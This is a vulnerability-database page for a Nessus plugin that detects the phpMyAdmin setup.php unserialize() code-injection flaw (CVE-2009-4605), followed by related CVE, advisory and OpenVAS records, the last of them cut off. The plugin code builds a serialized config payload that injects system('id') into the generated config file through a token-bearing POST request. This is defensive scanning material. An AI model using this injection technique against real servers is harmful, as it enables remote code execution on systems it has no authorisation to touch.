Search...

phpMyAdmin setup.php unserialize() Arbitrary PHP Code Execution (PMASA-2010-3)

2010-01-27T00:00:00

ID PHPMYADMIN_PMASA_2010_3.NASL
Type nessus
Reporter This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.
Modified 2010-01-27T00:00:00

Description

The setup script included with the version of phpMyAdmin installed on the remote host does not properly sanitize user-supplied input before using it to generate a config file for the application. Submitting a specially crafted POST request can result in arbitrary PHP code injection.

A remote attacker could exploit this issue in a cross-site request forgery attack, which could be used to execute arbitrary commands on the system with the privileges of the web server.

                                        
                                            #%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#


include('deprecated_nasl_level.inc');
include('compat.inc');


if (description)
{
  script_id(44324);
  script_version("1.11");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  script_cve_id("CVE-2009-4605");
  script_bugtraq_id(37861);
  script_xref(name:"Secunia", value:"38211");

  script_name(english:"phpMyAdmin setup.php unserialize() Arbitrary PHP Code Execution (PMASA-2010-3)");
  script_summary(english:"Checks if code can be injected into the config file");

  script_set_attribute(
    attribute:"synopsis",
    value:
"The remote web server contains a PHP application that may allow
execution of arbitrary code."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The setup script included with the version of phpMyAdmin installed on
the remote host does not properly sanitize user-supplied input before
using it to generate a config file for the application.  Submitting a
specially crafted POST request can result in arbitrary PHP code
injection.

A remote attacker could exploit this issue in a cross-site request
forgery attack, which could be used to execute arbitrary commands
on the system with the privileges of the web server."
  );
  script_set_attribute(attribute:"see_also", value:"https://www.phpmyadmin.net/security/PMASA-2010-3/");
  script_set_attribute(attribute:"solution", value:"Upgrade to phpMyAdmin 2.11.10 / 3.0.0 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2010/01/15");
  script_set_attribute(attribute:"patch_publication_date", value:"2010/01/15");
  script_set_attribute(attribute:"plugin_publication_date", value:"2010/01/27");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:phpmyadmin:phpmyadmin");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.");

  script_dependencies("phpMyAdmin_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/phpMyAdmin", "www/PHP");
  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("url_func.inc");


port = get_http_port(default:80, php:TRUE);
install = get_install_from_kb(appname:'phpMyAdmin', port:port, exit_on_fail:TRUE);

# The first request makes sure the page exists, the PMA config is writeable,
# and extracts the token
url = install['dir']+'/scripts/setup.php';
res = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail:TRUE);

# If the config can't be written to disk, this cannot be exploited - even
# if the software is unpatched.  In which case, only continue if paranoid.
if ('Can not load or save configuration' &gt;&lt; res[2])
{
  if (report_paranoia &lt; 2)
    exit(1, 'The phpMyAdmin install at '+build_url(qs:install['dir']+'/', port:port)+' might be unpatched, but cannot be exploited.');
  else
    config_writeable = FALSE;
}
else config_writeable = TRUE;

# Extract the token.
token = NULL;
pat = 'input type="hidden" name="token" value="([^"]+)"';
match = eregmatch(string:res[2], pattern:pat);
if (match) token = match[1];
else exit(1, "Unable to extract token from "+build_url(qs:url, port:port));

# The second request determines if PHP code can be injected into the config file
cmd = 'id';
array_name = "TNS";
inj_code = SCRIPT_NAME+"'] = "+unixtime()+"; system('"+cmd+"'); //";
expected_out = "$cfg['Servers'][$i]['"+array_name+"']['" + inj_code;
config=
  'a:1:{'+
    's:7:"Servers";'+
    'a:1:{'+
      'i:0;'+
      'a:1:{'+
        's:'+strlen(array_name)+':"'+array_name+'";'+
        'a:1:{'+
          's:'+strlen(inj_code)+':"'+inj_code+'";'+
          's:0:"";'+
        '}'+
      '}'+
    '}'+
  '}';
postdata =
  'token='+token+'&'+
  'action=download&'+
  'configuration='+urlencode(str:config);
res = http_send_recv3(
  method:"POST",
  item:url,
  port:port,
  data:postdata,
  content_type:"application/x-www-form-urlencoded",
  exit_on_fail:TRUE
);

if (expected_out &gt;&lt; res[2])
{
  if (!config_writeable)
  {
    report =
      '\nEven though the software is unpatched, the web server does not\n'+
      'have permission to write the configuration file to disk, which\n'+
      'means the vulnerability cannot be exploited at this time.\n';
    security_hole(port:port, extra:report);
  }
  else security_hole(port);
}
else
{
  full_url = build_url(qs:install['dir']+'/', port:port);
  exit(0, 'The phpMyAdmin install at '+full_url+' is not affected.');
}

JSON Vulners Source

Initial Source

{"id": "PHPMYADMIN_PMASA_2010_3.NASL", "bulletinFamily": "scanner", "title": "phpMyAdmin setup.php unserialize() Arbitrary PHP Code Execution (PMASA-2010-3)", "description": "The setup script included with the version of phpMyAdmin installed on\nthe remote host does not properly sanitize user-supplied input before\nusing it to generate a config file for the application. Submitting a\nspecially crafted POST request can result in arbitrary PHP code\ninjection.\n\nA remote attacker could exploit this issue in a cross-site request\nforgery attack, which could be used to execute arbitrary commands\non the system with the privileges of the web server.", "published": "2010-01-27T00:00:00", "modified": "2010-01-27T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/44324", "reporter": "This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.", "references": ["https://www.phpmyadmin.net/security/PMASA-2010-3/"], "cvelist": ["CVE-2009-4605"], "type": "nessus", "lastseen": "2021-01-20T13:26:25", "edition": 25, "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-4605"]}, {"type": "seebug", "idList": ["SSV:18972"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231067338", "OPENVAS:67338", "OPENVAS:1361412562310100589"]}, {"type": "phpmyadmin", "idList": ["PHPMYADMIN:PMASA-2010-3"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2034-1:622E3"]}, {"type": "nessus", "idList": ["SUSE_11_0_PHPMYADMIN-091209.NASL", "DEBIAN_DSA-2034.NASL"]}], "modified": "2021-01-20T13:26:25", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-01-20T13:26:25", "rev": 2}, "vulnersScore": 7.5}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\n\nif (description)\n{\n script_id(44324);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2009-4605\");\n script_bugtraq_id(37861);\n script_xref(name:\"Secunia\", value:\"38211\");\n\n script_name(english:\"phpMyAdmin setup.php unserialize() Arbitrary PHP Code Execution (PMASA-2010-3)\");\n script_summary(english:\"Checks if code can be injected into the config file\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server contains a PHP application that may allow\nexecution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The setup script included with the version of phpMyAdmin installed on\nthe remote host does not properly sanitize user-supplied input before\nusing it to generate a config file for the application. Submitting a\nspecially crafted POST request can result in arbitrary PHP code\ninjection.\n\nA remote attacker could exploit this issue in a cross-site request\nforgery attack, which could be used to execute arbitrary commands\non the system with the privileges of the web server.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.phpmyadmin.net/security/PMASA-2010-3/\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to phpMyAdmin 2.11.10 / 3.0.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpMyAdmin\", \"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\n\nport = get_http_port(default:80, php:TRUE);\ninstall = get_install_from_kb(appname:'phpMyAdmin', port:port, exit_on_fail:TRUE);\n\n# The first request makes sure the page exists, the PMA config is writeable,\n# and extracts the token\nurl = install['dir']+'/scripts/setup.php';\nres = http_send_recv3(method:\"GET\", item:url, port:port, exit_on_fail:TRUE);\n\n# If the config can't be written to disk, this cannot be exploited - even\n# if the software is unpatched. In which case, only continue if paranoid.\nif ('Can not load or save configuration' >< res[2])\n{\n if (report_paranoia < 2)\n exit(1, 'The phpMyAdmin install at '+build_url(qs:install['dir']+'/', port:port)+' might be unpatched, but cannot be exploited.');\n else\n config_writeable = FALSE;\n}\nelse config_writeable = TRUE;\n\n# Extract the token.\ntoken = NULL;\npat = 'input type=\"hidden\" name=\"token\" value=\"([^\"]+)\"';\nmatch = eregmatch(string:res[2], pattern:pat);\nif (match) token = match[1];\nelse exit(1, \"Unable to extract token from \"+build_url(qs:url, port:port));\n\n# The second request determines if PHP code can be injected into the config file\ncmd = 'id';\narray_name = \"TNS\";\ninj_code = SCRIPT_NAME+\"'] = \"+unixtime()+\"; system('\"+cmd+\"'); //\";\nexpected_out = \"$cfg['Servers'][$i]['\"+array_name+\"']['\" + inj_code;\nconfig=\n 'a:1:{'+\n 's:7:\"Servers\";'+\n 'a:1:{'+\n 'i:0;'+\n 'a:1:{'+\n 's:'+strlen(array_name)+':\"'+array_name+'\";'+\n 'a:1:{'+\n 's:'+strlen(inj_code)+':\"'+inj_code+'\";'+\n 's:0:\"\";'+\n '}'+\n '}'+\n '}'+\n '}';\npostdata =\n 'token='+token+'&'+\n 'action=download&'+\n 'configuration='+urlencode(str:config);\nres = http_send_recv3(\n method:\"POST\",\n item:url,\n port:port,\n data:postdata,\n content_type:\"application/x-www-form-urlencoded\",\n exit_on_fail:TRUE\n);\n\nif (expected_out >< res[2])\n{\n if (!config_writeable)\n {\n report =\n '\\nEven though the software is unpatched, the web server does not\\n'+\n 'have permission to write the configuration file to disk, which\\n'+\n 'means the vulnerability cannot be exploited at this time.\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse\n{\n full_url = build_url(qs:install['dir']+'/', port:port);\n exit(0, 'The phpMyAdmin install at '+full_url+' is not affected.');\n}\n", "naslFamily": "CGI abuses", "pluginID": "44324", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin"], "scheme": null}

{"cve": [{"lastseen": "2021-02-02T05:40:08", "description": "scripts/setup.php (aka the setup script) in phpMyAdmin 2.11.x before 2.11.10 calls the unserialize function on the values of the (1) configuration and (2) v[0] parameters, which might allow remote attackers to conduct cross-site request forgery (CSRF) attacks via unspecified vectors.", "edition": 4, "cvss3": {}, "published": "2010-01-19T16:30:00", "title": "CVE-2009-4605", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4605"], "modified": "2010-05-06T05:52:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin:2.11.6.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.1.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.1.2", "cpe:/a:phpmyadmin:phpmyadmin:2.11.9.6", "cpe:/a:phpmyadmin:phpmyadmin:2.11.9.5", "cpe:/a:phpmyadmin:phpmyadmin:2.11.7.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.2.2", "cpe:/a:phpmyadmin:phpmyadmin:2.11.4.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.5.2", "cpe:/a:phpmyadmin:phpmyadmin:2.11.7.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.9.2", "cpe:/a:phpmyadmin:phpmyadmin:2.11.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.5.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.9.4", "cpe:/a:phpmyadmin:phpmyadmin:2.11.1.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.9.3", "cpe:/a:phpmyadmin:phpmyadmin:2.11.2.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.9.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.8.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.3.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.2.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.9.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.5.0"], "id": "CVE-2009-4605", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4605", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.9.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.9.6:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.9.2:*:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-11-19T18:15:43", "description": "BUGTRAQ ID: 37861\r\nCVE(CAN) ID: CVE-2009-4605\r\n\r\nphpMyAdmin\u662f\u7528PHP\u7f16\u5199\u7684\u5de5\u5177\uff0c\u7528\u4e8e\u901a\u8fc7WEB\u7ba1\u7406MySQL\u3002\r\n\r\nphpMyAdmin\u4f7f\u7528\u4e86\u4f20\u9001\u7ed9scripts/setup.php\u811a\u672c\u7684configuration\u548cv[0]\u8f93\u5165\u53c2\u6570\u6765\u8c03\u7528unserialize\u51fd\u6570\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u6076\u610f\u8bf7\u6c42\u6267\u884c\u8de8\u7ad9\u8bf7\u6c42\u4f2a\u9020\u653b\u51fb\uff0c\u4ee5\u5176\u4ed6\u7528\u6237\u7684\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\n\nphpMyAdmin 2.11.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nphpMyAdmin\r\n----------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.phpmyadmin.net/", "published": "2010-01-21T00:00:00", "title": "phpMyAdmin unserialize()\u8c03\u7528\u8de8\u7ad9\u8bf7\u6c42\u4f2a\u9020\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4605"], "modified": "2010-01-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-18972", "id": "SSV:18972", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": ""}], "phpmyadmin": [{"lastseen": "2019-05-29T17:20:07", "bulletinFamily": "software", "cvelist": ["CVE-2009-4605"], "description": "## PMASA-2010-3\n\n**Announcement-ID:** PMASA-2010-3\n\n**Date:** 2010-01-15\n\n**Updated:** 2010-01-27\n\n### Summary\n\nUnsafe usage of unserialize function.\n\n### Description\n\nphpMyAdmin used the unserialize() PHP function on potentially unsafe data in setup script, what could be potentially used for XSRF attack, which can lead to code execution.\n\n### Severity\n\nWe consider these vulnerabilities to be critical.\n\n### Affected Versions\n\nFor 2.11.x: versions before 2.11.10 are affected.\n\n### Unaffected Versions\n\n3.x releases are not affected.\n\n### Solution\n\nUpgrade to phpMyAdmin 3.0.0 or 2.11.10.\n\n### References\n\nWe wish to thank to Thomas Biege and Sebastian Krahmer for pointing out this issue.\n\nAssigned CVE ids: [CVE-2009-4605](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4605>)\n\nCWE ids: [CWE-661](<https://cwe.mitre.org/data/definitions/661.html>) [CWE-352](<https://cwe.mitre.org/data/definitions/352.html>)\n\n### Patches\n\nThe following commits have been made on the 2.11 branch to fix this issue:\n\n * [719e0dce659f4a452d06a26e9432d888531a6e7b](<https://github.com/phpmyadmin/phpmyadmin/commit/719e0dce659f4a452d06a26e9432d888531a6e7b>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). \n", "edition": 2, "modified": "2010-01-27T00:00:00", "published": "2010-01-15T00:00:00", "id": "PHPMYADMIN:PMASA-2010-3", "href": "https://www.phpmyadmin.net/security/PMASA-2010-3/", "title": "Unsafe usage of unserialize function.", "type": "phpmyadmin", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:40:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4605"], "description": "phpMyAdmin is prone to a vulnerability that lets attackers execute\n arbitrary code in the context of the webserver process.", "modified": "2019-03-01T00:00:00", "published": "2010-04-20T00:00:00", "id": "OPENVAS:1361412562310100589", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100589", "type": "openvas", "title": "phpMyAdmin 'unserialize()' Remote Code Execution Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_37861.nasl 13960 2019-03-01 13:18:27Z cfischer $\n#\n# phpMyAdmin 'unserialize()' Remote Code Execution Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100589\");\n script_version(\"$Revision: 13960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-01 14:18:27 +0100 (Fri, 01 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-20 13:41:39 +0200 (Tue, 20 Apr 2010)\");\n script_bugtraq_id(37861);\n script_cve_id(\"CVE-2009-4605\");\n script_name(\"phpMyAdmin 'unserialize()' Remote Code Execution Vulnerability\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2010 Greenbone Networks GmbH\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/37861\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-3.php\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to a vulnerability that lets attackers execute\n arbitrary code in the context of the webserver process.\");\n\n script_tag(name:\"impact\", value:\"This may facilitate unauthorized access or privilege escalation.\n Other attacks are also possible.\");\n\n script_tag(name:\"affected\", value:\"Versions prior to phpMyAdmin 3.0.0 or 2.11.10 are vulnerable.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references for more information.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_is_less( version:vers, test_version:\"2.11.10\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"2.11.10/3.0.0\" );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2018-01-08T12:54:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-7252", "CVE-2009-4605", "CVE-2008-7251"], "description": "The remote host is missing an update to phpmyadmin\nannounced via advisory DSA 2034-1.", "modified": "2018-01-05T00:00:00", "published": "2010-05-04T00:00:00", "id": "OPENVAS:136141256231067338", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231067338", "type": "openvas", "title": "Debian Security Advisory DSA 2034-1 (phpmyadmin)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2034_1.nasl 8296 2018-01-05 07:28:01Z teissa $\n# Description: Auto-generated from advisory DSA 2034-1 (phpmyadmin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in phpMyAdmin, a tool\nto administer MySQL over the web. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2008-7251\n\nphpMyAdmin may create a temporary directory, if the configured directory\ndoes not exist yet, with insecure filesystem permissions.\n\nCVE-2008-7252\n\nphpMyAdmin uses predictable filenames for temporary files, which may\nlead to a local denial of service attack or privilege escalation.\n\nCVE-2009-4605\n\nThe setup.php script shipped with phpMyAdmin may unserialize untrusted\ndata, allowing for cross site request forgery.\n\n\nFor the stable distribution (lenny), these problems have been fixed in version\nphpmyadmin 2.11.8.1-5+lenny4.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 3.2.4-1.\n\nWe recommend that you upgrade your phpmyadmin package.\";\ntag_summary = \"The remote host is missing an update to phpmyadmin\nannounced via advisory DSA 2034-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202034-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.67338\");\n script_version(\"$Revision: 8296 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 08:28:01 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-04 05:52:15 +0200 (Tue, 04 May 2010)\");\n script_cve_id(\"CVE-2008-7251\", \"CVE-2008-7252\", \"CVE-2009-4605\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 2034-1 (phpmyadmin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"phpmyadmin\", ver:\"2.11.8.1-5+lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-7252", "CVE-2009-4605", "CVE-2008-7251"], "description": "The remote host is missing an update to phpmyadmin\nannounced via advisory DSA 2034-1.", "modified": "2017-07-07T00:00:00", "published": "2010-05-04T00:00:00", "id": "OPENVAS:67338", "href": "http://plugins.openvas.org/nasl.php?oid=67338", "type": "openvas", "title": "Debian Security Advisory DSA 2034-1 (phpmyadmin)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2034_1.nasl 6614 2017-07-07 12:09:12Z cfischer $\n# Description: Auto-generated from advisory DSA 2034-1 (phpmyadmin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 